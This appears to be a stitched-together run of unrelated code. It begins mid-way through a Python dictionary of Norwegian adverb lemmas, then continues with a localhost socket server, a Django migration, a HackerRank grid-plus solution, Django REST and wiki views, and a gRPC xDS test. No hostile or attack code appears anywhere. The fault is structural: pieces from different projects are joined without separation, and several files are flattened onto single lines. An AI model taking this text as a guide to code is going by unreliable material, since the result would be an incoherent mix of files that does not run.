'herre': ('herre',), 'hersens': ('hersens',), 'hertil': ('hertil',), 'herunder': ('herunder',), 'herved': ('herved',), 'himlende': ('himlende',), 'hisset': ('hisset',), 'hist': ('hist',), 'hit': ('hit',), 'hitover': ('hitover',), 'hittil': ('hittil',), 'hjem': ('hjem',), 'hjemad': ('hjemad',), 'hjemetter': ('hjemetter',), 'hjemme': ('hjemme',), 'hjemmefra': ('hjemmefra',), 'hjemom': ('hjemom',), 'hjemover': ('hjemover',), 'hodekulls': ('hodekulls',), 'hodestupes': ('hodestupes',), 'hodestups': ('hodestups',), 'hoggende': ('hoggende',), 'honoris causa': ('honoris causa',), 'hoppende': ('hoppende',), 'hulter': ('hulter',), 'hundretusenvis': ('hundretusenvis',), 'hundrevis': ('hundrevis',), 'hurra-meg-rundt': ('hurra-meg-rundt',), 'husimellom': ('husimellom',), 'hvi': ('hvi',), 'hvor': ('hvor',), 'hvor hen': ('hvor hen',), 'hvorav': ('hvorav',), 'hvordan': ('hvordan',), 'hvoretter': ('hvoretter',), 'hvorfor': ('hvorfor',), 'hvorfra': ('hvorfra',), 
'hvori': ('hvori',), 'hvoriblant': ('hvoriblant',), 'hvorimot': ('hvorimot',), 'hvorledes': ('hvorledes',), 'hvormed': ('hvormed',), 'hvorom': ('hvorom',), 'hvorpå': ('hvorpå',), 'hånt': ('hånt',), 'høylig': ('høylig',), 'høyst': ('høyst',), 'i aften': ('i aften',), 'i aftes': ('i aftes',), 'i alle fall': ('i alle fall',), 'i dag': ('i dag',), 'i fjor': ('i fjor',), 'i fleng': ('i fleng',), 'i forfjor': ('i forfjor',), 'i forgårs': ('i forgårs',), 'i gjerde': ('i gjerde',), 'i gjære': ('i gjære',), 'i grunnen': ('i grunnen',), 'i går': ('i går',), 'i hende': ('i hende',), 'i hjel': ('i hjel',), 'i hug': ('i hug',), 'i huleste': ('i huleste',), 'i stedet': ('i stedet',), 'iallfall': ('iallfall',), 'ibidem': ('ibidem',), 'id est': ('id est',), 'igjen': ('igjen',), 'ikke': ('ikke',), 'ildende': ('ildende',), 'ille': ('ille',), 'imens': ('imens',), 'imidlertid': ('imidlertid',), 'in absentia': ('in absentia',), 'in absurdum': ('in absurdum',), 'in blanko': ('in blanko',), 'in casu': ('in casu',), 'in contumaciam': ('in contumaciam',), 'in corpore': ('in corpore',), 'in duplo': ('in duplo',), 'in extenso': ('in extenso',), 'in flagranti': ('in flagranti',), 'in honorem': ('in honorem',), 'in medias res': ('in medias res',), 'in memoriam': ('in memoriam',), 'in mente': ('in mente',), 'in natura': ('in natura',), 'in nuce': ('in nuce',), 'in persona': ('in persona',), 'in quarto': ('in quarto',), 'in saldo': ('in saldo',), 'in salvo': ('in salvo',), 'in situ': ('in situ',), 'in solidum': ('in solidum',), 'in spe': ('in spe',), 'in triplo': ('in triplo',), 'in vitro': ('in vitro',), 'in vivo': ('in vivo',), 'ingenlunde': ('ingenlunde',), 'ingensteds': ('ingensteds',), 'inklusiv': ('inklusiv',), 'inklusive': ('inklusive',), 'inkognito': ('inkognito',), 'inn': ('inn',), 'innad': ('innad',), 'innafra': ('innafra',), 'innalands': ('innalands',), 'innaskjærs': ('innaskjærs',), 'inne': ('inne',), 'innenat': ('innenat',), 'innenfra': ('innenfra',), 'innenlands': ('innenlands',), 'innenskjærs': ('innenskjærs',), 'innledningsvis': ('innledningsvis',), 'innleiingsvis': ('innleiingsvis',), 'innomhus': ('innomhus',), 'isteden': ('isteden',), 'især': ('især',), 'item': ('item',), 'ja menn': ('ja menn',), 'ja så menn': ('ja så menn',), 'jammen': ('jammen',), 'jamnlig': ('jamnlig',), 'jamsides': ('jamsides',), 'jamt over': ('jamt over',), 'jamvel': ('jamvel',), 'jaså': ('jaså',), 'jevnlig': ('jevnlig',), 'jevnsides': ('jevnsides',), 'jevnt over': ('jevnt over',), 'jo menn': ('jo menn',), 'jommen': ('jommen',), 'just': ('just',), 'kanon': ('kanon',), 'kanskje': ('kanskje',), 'kav': ('kav',), 'kavende': ('kavende',), 'kilovis': ('kilovis',), 'klin': ('klin',), 'klink': ('klink',), 'klinkende': ('klinkende',), 'klokelig': ('klokelig',), 'knakende': ('knakende',), 'knapt': ('knapt',), 'knasende': ('knasende',), 'knekkende': ('knekkende',), 'knøtrende': ('knøtrende',), 'knøttende': ('knøttende',), 'kolende': ('kolende',), 'kul': ('kul',), 'kuli': ('kuli',), 'kun': ('kun',), 'kvartalsvis': ('kvartalsvis',), 'kvekk': ('kvekk',), 'kølende': ('kølende',), 'lagerfritt': ('lagerfritt',), 'lagom': ('lagom',), 'lagvis': ('lagvis',), 'landimellom': ('landimellom',), 'landverts': ('landverts',), 'langt': ('langt',), 'lenger': ('langt',), 'lengst': ('langt',), 'langveges': ('langveges',), 'langvegesfra': ('langvegesfra',), 'langvegs': ('langvegs',), 'langvegsfra': ('langvegsfra',), 'langveis': ('langveis',), 'langveisfra': ('langveisfra',), 'larghetto': ('larghetto',), 'largo': ('largo',), 'lassevis': ('lassevis',), 'legato': 
('legato',), 'leilighetsvis': ('leilighetsvis',), 'lell': ('lell',), 'lenge': ('lenge',), 'lenger': ('lenge',), 'lengst': ('lenge',), 'lenger': ('lenger',), 'liddelig': ('liddelig',), 'like': ('like',), 'likeledes': ('likeledes',), 'likeså': ('likeså',), 'likevel': ('likevel',), 'likså': ('likså',), 'lissom': ('lissom',), 'litervis': ('litervis',), 'livende': ('livende',), 'lovformelig': ('lovformelig',), 'lovlig': ('lovlig',), 'lukt': ('lukt',), 'lut': ('lut',), 'luta': ('luta',), 'lutende': ('lutende',), 'lykkeligvis': ('lykkeligvis',), 'lynfort': ('lynfort',), 'lys': ('lys',), 'maestoso': ('maestoso',), 'mala fide': ('mala fide',), 'malapropos': ('malapropos',), 'mannemellom': ('mannemellom',), 'massevis': ('massevis',), 'med rette': ('med rette',), 'medio': ('medio',), 'medium': ('medium',), 'medsols': ('medsols',), 'medstrøms': ('medstrøms',), 'meget': ('meget',), 'mengdevis': ('mengdevis',), 'metervis': ('metervis',), 'mezzoforte': ('mezzoforte',), 'midsommers': ('midsommers',), 'midt': ('midt',), 'midtfjords': ('midtfjords',), 'midtskips': ('midtskips',), 'midtsommers': ('midtsommers',), 'midtveges': ('midtveges',), 'midtvegs': ('midtvegs',), 'midtveis': ('midtveis',), 'midtvinters': ('midtvinters',), 'midvinters': ('midvinters',), 'milevis': ('milevis',), 'millionvis': ('millionvis',), 'min sann': ('min sann',), 'min sant': ('min sant',), 'min santen': ('min santen',), 'minus': ('minus',), 'mo': ('mo',), 'molto': ('molto',), 'motsols': ('motsols',), 'motstrøms': ('motstrøms',), 'mukk': ('mukk',), 'mukkende': ('mukkende',), 'muligens': ('muligens',), 'muligvis': ('muligvis',), 'murende': ('murende',), 'musende': ('musende',), 'mutters': ('mutters',), 'månedsvis': ('månedsvis',), 'naggende': ('naggende',), 'naturligvis': ('naturligvis',), 'nauende': ('nauende',), 'navnlig': ('navnlig',), 'ned': ('ned',), 'nedad': ('nedad',), 'nedatil': ('nedatil',), 'nede': ('nede',), 'nedentil': ('nedentil',), 'nedenunder': ('nedenunder',), 'nedstrøms': ('nedstrøms',), 'neigu': ('neigu',), 'neimen': ('neimen',), 'nemlig': ('nemlig',), 'neppe': ('neppe',), 'nesegrus': ('nesegrus',), 'nest': ('nest',), 'nesten': ('nesten',), 'nettopp': ('nettopp',), 'noenlunde': ('noenlunde',), 'noensinne': ('noensinne',), 'noensteds': ('noensteds',), 'nok': ('nok',), 'noksom': ('noksom',), 'nokså': ('nokså',), 'non stop': ('non stop',), 'nonstop': ('nonstop',), 'nord': ('nord',), 'nordafjells': ('nordafjells',), 'nordaust': ('nordaust',), 'nordenfjells': ('nordenfjells',), 'nordost': ('nordost',), 'nordvest': ('nordvest',), 'nordøst': ('nordøst',), 'notabene': ('notabene',), 'nyss': ('nyss',), 'nå': ('nå',), 'når': ('når',), 'nåvel': ('nåvel',), 'nær': ('nær',), 'nærere': ('nær',), 'nærmere': ('nær',), 'nærest': ('nær',), 'nærmest': ('nær',), 'nære': ('nære',), 'nærere': ('nærere',), 'nærest': ('nærest',), 'nærme': ('nærme',), 'nærmere': ('nærmere',), 'nærmest': ('nærmest',), 'nødig': ('nødig',), 'nødigere': ('nødig',), 'nødigst': ('nødig',), 'nødvendigvis': ('nødvendigvis',), 'offside': ('offside',), 'ofte': ('ofte',), 'oftere': ('ofte',), 'oftest': ('ofte',), 'også': ('også',), 'om att': ('om att',), 'om igjen': ('om igjen',), 'omme': ('omme',), 'omsider': ('omsider',), 'omsonst': ('omsonst',), 'omtrent': ('omtrent',), 'onnimellom': ('onnimellom',), 'opp': ('opp',), 'opp att': ('opp att',), 'opp ned': ('opp ned',), 'oppad': ('oppad',), 'oppe': ('oppe',), 'oppstrøms': ('oppstrøms',), 'ost': ('ost',), 'ovabords': ('ovabords',), 'ovatil': ('ovatil',), 'oven': ('oven',), 'ovenbords': ('ovenbords',), 'oventil': 
('oventil',), 'overalt': ('overalt',), 'overens': ('overens',), 'overhodet': ('overhodet',), 'overlag': ('overlag',), 'overmorgen': ('overmorgen',), 'overmåte': ('overmåte',), 'overvettes': ('overvettes',), 'pakkende': ('pakkende',), 'pal': ('pal',), 'par avion': ('par avion',), 'par excellence': ('par excellence',), 'parlando': ('parlando',), 'pars pro toto': ('pars pro toto',), 'partout': ('partout',), 'parvis': ('parvis',), 'per capita': ('per capita',), 'pianissimo': ('pianissimo',), 'piano': ('piano',), 'pinende': ('pinende',), 'pinnende': ('pinnende',), 'pist': ('pist',), 'pizzicato': ('pizzicato',), 'pladask': ('pladask',), 'plent': ('plent',), 'plenty': ('plenty',), 'pluss': ('pluss',), 'porsjonsvis': ('porsjonsvis',), 'portamento': ('portamento',), 'portato': ('portato',), 'post festum': ('post festum',), 'post meridiem': ('post meridiem',), 'post mortem': ('post mortem',), 'prestissimo': ('prestissimo',), 'presto': ('presto',), 'prima vista': ('prima vista',), 'primo': ('primo',), 'pro anno': ('pro anno',), 'pro persona': ('pro persona',), 'pro tempore': ('pro tempore',), 'proforma': ('proforma',), 'prompt': ('prompt',), 'prompte': ('prompte',), 'proppende': ('proppende',), 'prosentvis': ('prosentvis',), 'pukka': ('pukka',), 'puljevis': ('puljevis',), 'punktvis': ('punktvis',), 'pyton': ('pyton',), 'pø om pø': ('pø om pø',), 'quantum satis': ('quantum satis',), 'rammende': ('rammende',), 'rangsøles': ('rangsøles',), 'rasende': ('rasende',), 'ratevis': ('ratevis',), 'ratt': ('ratt',), 'rav': ('rav',), 'ravende': ('ravende',), 'reint': ('reint',), 'rent': ('rent',), 'respektive': ('respektive',), 'rettsøles': ('rettsøles',), 'reverenter': ('reverenter',), 'riktignok': ('riktignok',), 'rimeligvis': ('rimeligvis',), 'ringside': ('ringside',), 'rispende': ('rispende',), 'ritardando': ('ritardando',), 'riv': ('riv',), 'rubato': ('rubato',), 'ruskende': ('ruskende',), 'rykkevis': ('rykkevis',), 'saktelig': ('saktelig',), 'saktens': ('saktens',), 'sammen': ('sammen',), 'sammesteds': ('sammesteds',), 'sammestedsfra': ('sammestedsfra',), 'samstundes': ('samstundes',), 'samt': ('samt',), 'sann': ('sann',), 'sannelig': ('sannelig',), 'sannsynligvis': ('sannsynligvis',), 'sans phrase': ('sans phrase',), 'scilicet': ('scilicet',), 'seinhøstes': ('seinhøstes',), 'senhøstes': ('senhøstes',), 'sia': ('sia',), 'sic': ('sic',), 'sidelangs': ('sidelangs',), 'sidelengs': ('sidelengs',), 'siden': ('siden',), 'sideveges': ('sideveges',), 'sidevegs': ('sidevegs',), 'sideveis': ('sideveis',), 'sikkerlig': ('sikkerlig',), 'silde': ('silde',), 'simpelthen': ('simpelthen',), 'sine anno': ('sine anno',), 'sistpå': ('sistpå',), 'sjelden': ('sjelden',), 'sjøleies': ('sjøleies',), 'sjøverts': ('sjøverts',), 'skeis': ('skeis',), 'skiftevis': ('skiftevis',), 'skita': ('skita',), 'skjøns': ('skjøns',), 'skogleies': ('skogleies',), 'skokkevis': ('skokkevis',), 'skrevs': ('skrevs',), 'skrittvis': ('skrittvis',), 'skrås': ('skrås',), 'skyllende': ('skyllende',), 'skåldende': ('skåldende',), 'slettes': ('slettes',), 'sluttelig': ('sluttelig',), 'smekk': ('smekk',), 'smellende': ('smellende',), 'småningom': ('småningom',), 'snart': ('snart',), 'snarere': ('snart',), 'snarest': ('snart',), 'sneisevis': ('sneisevis',), 'snesevis': ('snesevis',), 'snuft': ('snuft',), 'snupt': ('snupt',), 'snyt': ('snyt',), 'snyta': ('snyta',), 'snyte': ('snyte',), 'solo': ('solo',), 'sommerstid': ('sommerstid',), 'sommesteds': ('sommesteds',), 'spenna': ('spenna',), 'spent': ('spent',), 'spika': ('spika',), 'spikende': ('spikende',), 
'spildrende': ('spildrende',), 'spill': ('spill',), 'splinter': ('splinter',), 'splitter': ('splitter',), 'sporenstreks': ('sporenstreks',), 'sprangvis': ('sprangvis',), 'sprell': ('sprell',), 'sprut': ('sprut',), 'sprutende': ('sprutende',), 'sprøyte': ('sprøyte',), 'stakkato': ('stakkato',), 'stapp': ('stapp',), 'stappa': ('stappa',), 'stappende': ('stappende',), 'staurende': ('staurende',), 'stedvis': ('stedvis',), 'steika': ('steika',), 'stein': ('stein',), 'steinsens': ('steinsens',), 'stokk': ('stokk',), 'stokkende': ('stokkende',), 'straks': ('straks',), 'stringendo': ('stringendo',), 'stummende': ('stummende',), 'stundimellom': ('stundimellom',), 'stundom': ('stundom',), 'stundomtil': ('stundomtil',), 'stupende': ('stupende',), 'styggelig': ('styggelig',), 'styggende': ('styggende',), 'stykkevis': ('stykkevis',), 'styrbord': ('styrbord',), 'støtt': ('støtt',), 'støtvis': ('støtvis',), 'støytvis': ('støytvis',), 'sub rosa': ('sub rosa',), 'summa summarum': ('summa summarum',), 'surr': ('surr',), 'svinaktig': ('svinaktig',), 'svint': ('svint',), 'svintere': ('svint',), 'svintest': ('svint',), 'syd': ('syd',), 'sydost': ('sydost',), 'sydvest': ('sydvest',), 'sydøst': ('sydøst',), 'synderlig': ('synderlig',), 'så': ('så',), 'så pass': ('så pass',), 'sågar': ('sågar',), 'således': ('således',), 'såleis': ('såleis',), 'såpass': ('såpass',), 'såre': ('såre',), 'særdeles': ('særdeles',), 'særs': ('særs',), 'søkk': ('søkk',), 'søkkende': ('søkkende',), 'sønder': ('sønder',), 'sønna': ('sønna',), 'sønnafjells': ('sønnafjells',), 'sønnenfjells': ('sønnenfjells',), 'sør': ('sør',), 'søraust': ('søraust',), 'sørvest': ('sørvest',), 'sørøst': ('sørøst',), 'takimellom': ('takimellom',), 'takomtil': ('takomtil',), 'temmelig': ('temmelig',), 'ti': ('ti',), 'tidligdags': ('tidligdags',), 'tidsnok': ('tidsnok',), 'tidvis': ('tidvis',), 'til like': ('til like',), 'tilbake': ('tilbake',), 'tilfeldigvis': ('tilfeldigvis',), 'tilmed': ('tilmed',), 'tilnærmelsesvis': ('tilnærmelsesvis',), 'timevis': ('timevis',), 'titt': ('titt',), 'tiere': ('titt',), 'tiest': ('titt',), 'tjokkende': ('tjokkende',), 'tomreipes': ('tomreipes',), 'tott': ('tott',), 'trill': ('trill',), 'trillende': ('trillende',), 'trinnvis': ('trinnvis',), 'troppevis': ('troppevis',), 'troppo': ('troppo',), 'troppsvis': ('troppsvis',), 'trutt': ('trutt',), 'turevis': ('turevis',), 'turvis': ('turvis',), 'tusenvis': ('tusenvis',), 'tvers': ('tvers',), 'tvert': ('tvert',), 'tydeligvis': ('tydeligvis',), 'tålig': ('tålig',), 'tønnevis': ('tønnevis',), 'ufravendt': ('ufravendt',), 'ugjerne': ('ugjerne',), 'uheldigvis': ('uheldigvis',), 'ukevis': ('ukevis',), 'ultimo': ('ultimo',), 'ulykkeligvis': ('ulykkeligvis',), 'uløyves': ('uløyves',), 'undas': ('undas',), 'underhånden': ('underhånden',), 'undertiden': ('undertiden',), 'undervegs': ('undervegs',), 'underveis': ('underveis',), 'unntakelsesvis': ('unntakelsesvis',), 'unntaksvis': ('unntaksvis',), 'ustyggelig': ('ustyggelig',), 'ut': ('ut',), 'utaboks': ('utaboks',), 'utad': ('utad',), 'utalands': ('utalands',), 'utbygdes': ('utbygdes',), 'utdragsvis': ('utdragsvis',), 'ute': ('ute',), 'utelukkende': ('utelukkende',), 'utenat': ('utenat',), 'utenboks': ('utenboks',), 'utenlands': ('utenlands',), 'utomhus': ('utomhus',), 'uvegerlig': ('uvegerlig',), 'uviselig': ('uviselig',), 'uvislig': ('uvislig',), 'va banque': ('va banque',), 'vanligvis': ('vanligvis',), 'vann': ('vann',), 'ved like': ('ved like',), 'veggimellom': ('veggimellom',), 'vekk': ('vekk',), 'vekke': ('vekke',), 'vekselvis': 
('vekselvis',), 'vel': ('vel',), 'vest': ('vest',), 'vesta': ('vesta',), 'vestafjells': ('vestafjells',), 'vestenfjells': ('vestenfjells',), 'vibrato': ('vibrato',), 'vice versa': ('vice versa',), 'vide': ('vide',), 'viden': ('viden',), 'vinterstid': ('vinterstid',), 'viselig': ('viselig',), 'visselig': ('visselig',), 'visst': ('visst',), 'visstnok': ('visstnok',), 'vivace': ('vivace',), 'vonlig': ('vonlig',), 'vonom': ('vonom',), 'vonoms': ('vonoms',), 'vrangsøles': ('vrangsøles',), 'ytterlig': ('ytterlig',), 'åkkesom': ('åkkesom',), 'årevis': ('årevis',), 'årlig års': ('årlig års',), 'åssen': ('åssen',), 'ørende': ('ørende',), 'øst': ('øst',), 'østa': ('østa',), 'østafjells': ('østafjells',), 'østenfjells': ('østenfjells',), 'øyensynlig': ('øyensynlig',), 'antageligvis': ('antageligvis',), 'overimorgen': ('overimorgen',), 'unntagelsesvis': ('unntagelsesvis',), 'sist': ('sist',), 'stetse': ('stetse',), 'stikk': ('stikk',), 'storlig': ('storlig',), 'still going strong': ('still going strong',), 'til og med': ('til og med',), 'i hu': ('i hu',), 'dengang': ('dengang',), 'derborte': ('derborte',), 'derefter': ('derefter',), 'derinne': ('derinne',), 'dernede': ('dernede',), 'deromkring': ('deromkring',), 'etterhvert': ('etterhvert',), 'fordømrade': ('fordømrade',), 'foreksempel': ('foreksempel',), 'forsåvidt': ('forsåvidt',), 'forøvrig': ('forøvrig',), 'herefter': ('herefter',), 'hvertfall': ('hvertfall',), 'idag': ('idag',), 'ifjor': ('ifjor',), 'i gang': ('i gang',), 'igår': ('igår',), 'ihvertfall': ('ihvertfall',), 'ikveld': ('ikveld',), 'iland': ('iland',), 'imorgen': ('imorgen',), 'imøte': ('imøte',), 'inatt': ('inatt',), 'iorden': ('iorden',), 'istand': ('istand',), 'istedet': ('istedet',), 'javisst': ('javisst',), 'neivisst': ('neivisst',), 'fortsatt': ('fortsatt',), 'slik': ('slik',), 'sådan': ('sådan',), 'sånn': ('sånn',), 'for eksempel': ('for eksempel',), 'fra barnsbein av': ('fra barnsbein av',), 'fra barnsben av': ('fra barnsben av',), 'fra oven': ('fra oven',), 'på vidvanke': ('på vidvanke',), 'rubb og stubb': ('rubb og stubb',), 'akterifra': ('akterifra',), 'andsynes': ('andsynes',), 'austenom': ('austenom',), 'avslutningsvis': ('avslutningsvis',), 'bøttevis': ('bøttevis',), 'bakenfra': ('bakenfra',), 'bakenom': ('bakenom',), 'baki': ('baki',), 'bedriftsvis': ('bedriftsvis',), 'beklageligvis': ('beklageligvis',), 'benveges': ('benveges',), 'benveies': ('benveies',), 'bistrende': ('bistrende',), 'bitvis': ('bitvis',), 'bortenom': ('bortenom',), 'bortmed': ('bortmed',), 'bråfort': ('bråfort',), 'bunkevis': ('bunkevis',), 'ca': ('ca',), 'derigjennom': ('derigjennom',), 'derover': ('derover',), 'dessuaktet': ('dessuaktet',), 'distriktsvis': ('distriktsvis',), 'doloroso': ('doloroso',), 'erfaringsvis': ('erfaringsvis',), 'falskelig': ('falskelig',), 'fjellstøtt': ('fjellstøtt',), 'flekkvis': ('flekkvis',), 'flerveis': ('flerveis',), 'forholdvis': ('forholdvis',), 'fornemmelig': ('fornemmelig',), 'fornuftigvis': ('fornuftigvis',), 'forsiktigvis': ('forsiktigvis',), 'forskottsvis': ('forskottsvis',), 'forskuddsvis': ('forskuddsvis',), 'forutsetningsvis': ('forutsetningsvis',), 'framt': ('framt',), 'fremt': ('fremt',), 'godhetsfullt': ('godhetsfullt',), 'hvortil': ('hvortil',), 'hvorunder': ('hvorunder',), 'hvorved': ('hvorved',), 'iltrende': ('iltrende',), 'innatil': ('innatil',), 'innentil': ('innentil',), 'innigjennom': ('innigjennom',), 'kilometervis': ('kilometervis',), 'klattvis': ('klattvis',), 'kolonnevis': ('kolonnevis',), 'kommunevis': ('kommunevis',), 'listelig': 
('listelig',), 'lusende': ('lusende',), 'mildelig': ('mildelig',), 'milevidt': ('milevidt',), 'nordøstover': ('nordøstover',), 'ovenover': ('ovenover',), 'periodevis': ('periodevis',), 'pirende': ('pirende',), 'priori': ('priori',), 'rettnok': ('rettnok',), 'rykkvis': ('rykkvis',), 'sørøstover': ('sørøstover',), 'sørvestover': ('sørvestover',), 'sedvanligvis': ('sedvanligvis',), 'seksjonsvis': ('seksjonsvis',), 'styggfort': ('styggfort',), 'stykkomtil': ('stykkomtil',), 'sydvestover': ('sydvestover',), 'terminvis': ('terminvis',), 'tertialvis': ('tertialvis',), 'utdannelsesmessig': ('utdannelsesmessig',), 'vis-à-vis': ('vis-à-vis',), 'før': ('før',), 'jo': ('jo',), 'såvel': ('såvel',), 'efterhvert': ('efterhvert',), 'liksom': ('liksom',), 'dann og vann': ('dann og vann',), 'jaggu': ('jaggu',), 'joggu': ('joggu',), 'knekk': ('knekk',), 'live': ('live',), 'og': ('og',), 'sabla': ('sabla',), 'sikksakk': ('sikksakk',), 'stadig': ('stadig',), 'rett og slett': ('rett og slett',), 'såvidt': ('såvidt',), 'for moro skyld': ('for moro skyld',), 'omlag': ('omlag',), 'nattestid': ('nattestid',), 'sørpe': ('sørpe',), 'A.': ('A.',), 'selv': ('selv',), 'forlengst': ('forlengst',), 'sjøl': ('sjøl',), 'drita': ('drita',), 'ennu': ('ennu',), 'skauleies': ('skauleies',), 'iallefall': ('iallefall',), 'til alters': ('til alters',), 'pokka': ('pokka',), 'tilslutt': ('tilslutt',), 'i steden': ('i steden',), 'm.a.': ('m.a.',), 'til syvende og sist': ('til syvende og sist',), 'i en fei': ('i en fei',), 'ender og da': ('ender og da',), 'ender og gang': ('ender og gang',), 'fra arilds tid': ('fra arilds tid',), 'i hør og heim': ('i hør og heim',), 'for fote': ('for fote',), 'natterstid': ('natterstid',), 'natterstider': ('natterstider',), 'høgstdags': ('høgstdags',), 'høgstnattes': ('høgstnattes',), 'beint frem': ('beint frem',), 'beinveges': ('beinveges',), 'beinvegs': ('beinvegs',), 'beinveis': ('beinveis',), 'benvegs': ('benvegs',), 'benveis': ('benveis',), 'en garde': ('en garde',), 'etter hvert': ('etter hvert',), 'framåt': ('framåt',), 'krittende': ('krittende',), 'kvivitt': ('kvivitt',), 'maksis': ('maksis',), 'mangesteds': ('mangesteds',), 'møkka': ('møkka',), 'pill': ('pill',), 'sellende': ('sellende',), 'sirka': ('sirka',), 'subito': ('subito',), 'til sammen': ('til sammen',), 'tomrepes': ('tomrepes',), 'medurs': ('medurs',), 'moturs': ('moturs',), 'til ansvar': ('til ansvar',), 'til ansvars': ('til ansvars',), 'til fullnads': ('til fullnads',), 'concertando': ('concertando',), 'lesto': ('lesto',), 'tardando': ('tardando',), 'natters tid': ('natters tid',), 'natters tider': ('natters tider',), 'snydens': ('snydens',) }
import socket
import logic
import sys

sock = socket.socket()
server_address = ('localhost', 9080)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
_logic = logic.Logic('vadik')
sock.listen(1)

while True:
    print('waiting for connection')
    connection, client_address = sock.accept()
    try:
        print('connection from', client_address)
        while True:
            data = connection.recv(1024)
            print('received {!r}'.format(data))
            if data:
                print('sending data back to the client')
                encoding = 'utf-8'
                data = data.decode(encoding)
                print(data)
                data = _logic.query(data)
                connection.sendall(str.encode(str(data.is_exception)))
                connection.sendall(str.encode(data.str_for_print))
                connection.sendall(str.encode(str(data.exception_func)))
                connection.sendall(str.encode(data.fields_for_func))
            else:
                print('no data from', client_address)
                break
    finally:
        connection.close()
# -*- coding: utf-8 -*- # Generated by Django 1.9 on 2020-12-09 22:15 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('baza', '0011_auto_20201207_2227'), ] operations = [ migrations.RemoveField( model_name='zadanie', name='dopuszczenie', ), migrations.DeleteModel( name='Zadanie', ), ]
#!/bin/python3 import os # Complete the twoPluses function below. def twoPluses(grid): h, w = len(grid), len(grid[0]) mn = min(h, w) plus = [] is_good = lambda row, col: grid[row][col] == 'G' how = lambda x: 2 * x - 1 for step in range(1, mn // 2 + (1 if mn % 2 else 0)): for r in range(step, h - step): for c in range(step, w - step): if is_good(r, c): s1 = {(r1, c) for r1 in range(r - 1, r - step - 1, -1) if is_good(r1, c)} s2 = {(r1, c) for r1 in range(r + 1, r + step + 1, +1) if is_good(r1, c)} s3 = {(r, c1) for c1 in range(c - 1, c - step - 1, -1) if is_good(r, c1)} s4 = {(r, c1) for c1 in range(c + 1, c + step + 1, +1) if is_good(r, c1)} if len(s1) == len(s2) == len(s3) == len(s4) == step: plus.append((how(2 * step + 1), {(r, c)} | s1 | s2 | s3 | s4)) if not plus: return 1 if len(plus) == 1: return plus.pop()[0] from itertools import combinations combs = [s1 * s2 for (s1, a), (s2, b) in combinations(plus, 2) if a.isdisjoint(b)] return max(combs) if combs else plus.pop()[0] if __name__ == '__main__': fptr = open(os.environ['OUTPUT_PATH'], 'w') nm = input().split() n = int(nm[0]) m = int(nm[1]) grid = [] for _ in range(n): grid_item = input() grid.append(grid_item) result = twoPluses(grid) fptr.write(str(result) + '\n') fptr.close()
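# Quick sanity check of twoPluses() against the first HackerRank "Ema's Supercomputer" sample,
# bypassing the stdin/OUTPUT_PATH harness above; the expected product is 5 (an area-5 plus times
# a disjoint area-1 plus).
sample_grid = [
    'GGGGGG',
    'GBBBGB',
    'GGGGGG',
    'GGBBGB',
    'GGGGGG',
]
print(twoPluses(sample_grid))  # expected: 5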
from rest_framework import generics from .models import NewsItem from .serializers import NewsItemSerializer, NewsItemPreviewSerializer class NewsItemPreviewList(generics.ListAPIView): model = NewsItem serializer_class = NewsItemPreviewSerializer paginate_by = 5 filter_fields = ('language', ) def get_queryset(self, *args, **kwargs): qs = super(NewsItemPreviewList, self).get_queryset() qs = qs.published() qs = qs.order_by('-publication_date') return qs class NewsItemList(generics.ListAPIView): model = NewsItem serializer_class = NewsItemSerializer paginate_by = 5 filter_fields = ('language', ) def get_queryset(self, *args, **kwargs): qs = super(NewsItemList, self).get_queryset() qs = qs.published() qs = qs.order_by('-publication_date') return qs class NewsItemDetail(generics.RetrieveAPIView): model = NewsItem serializer_class = NewsItemSerializer def get_queryset(self, *args, **kwargs): qs = super(NewsItemDetail, self).get_queryset() qs = qs.published() return qs
from django.shortcuts import render, redirect from django.http import HttpResponse from .forms import SearchForm import random from . import util import markdown as md def index(request): return render(request, "encyclopedia/index.html", { "entries": util.list_entries() }) def search(request, entry): value = util.get_entry(entry) if value is None: matches = util.match_title(entry) if not matches: return render(request, "encyclopedia/404.html", { "entry": entry, }) return render(request, "encyclopedia/matches.html", { "entries": matches, "requestedpage": entry, }) html = md.markdown(value, extensions=['markdown.extensions.fenced_code']) return render(request, "encyclopedia/markdown.html", { "entry": entry, "body": html, }) def query(request): if request.method == "POST": return search(request, request.POST['q']) def createpage(request): if request.method == "GET": return render(request, "encyclopedia/createpage.html") elif request.method == "POST": title = request.POST['title'] if util.check_title(title): util.save_entry(title, request.POST['body']) return search(request, title) match = util.match_title(title).pop(0) return render(request, "encyclopedia/titleerror.html", { "title": match }) def editpage(request): if request.method == "GET": title = request.GET['q'] body = util.get_entry(title) return render(request, "encyclopedia/editpage.html", { "body": body, "title": title, }) elif request.method == "POST": print(request) title = request.POST['title'] util.save_entry(title, request.POST['body']) return redirect('/wiki/' + title) def randompage(request): entries = util.list_entries() random_entry = random.choice(entries) return redirect('/wiki/' + random_entry)
# Copyright 2020 gRPC authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from absl import flags from absl.testing import absltest from framework import xds_k8s_testcase logger = logging.getLogger(__name__) flags.adopt_module_key_flags(xds_k8s_testcase) # Type aliases _XdsTestServer = xds_k8s_testcase.XdsTestServer _XdsTestClient = xds_k8s_testcase.XdsTestClient class BaselineTest(xds_k8s_testcase.RegularXdsKubernetesTestCase): def test_traffic_director_grpc_setup(self): with self.subTest('0_create_health_check'): self.td.create_health_check() with self.subTest('1_create_backend_service'): self.td.create_backend_service() with self.subTest('2_create_url_map'): self.td.create_url_map(self.server_xds_host, self.server_xds_port) with self.subTest('3_create_target_proxy'): self.td.create_target_proxy() with self.subTest('4_create_forwarding_rule'): self.td.create_forwarding_rule(self.server_xds_port) test_servers: _XdsTestServer with self.subTest('5_start_test_server'): test_servers = self.startTestServers() with self.subTest('6_add_server_backends_to_backend_service'): self.setupServerBackends() test_client: _XdsTestClient with self.subTest('7_start_test_client'): test_client = self.startTestClient(test_servers[0]) with self.subTest('8_test_client_xds_config_exists'): self.assertXdsConfigExists(test_client) with self.subTest('9_test_server_received_rpcs_from_test_client'): self.assertSuccessfulRpcs(test_client) if __name__ == '__main__': absltest.main(failfast=True)
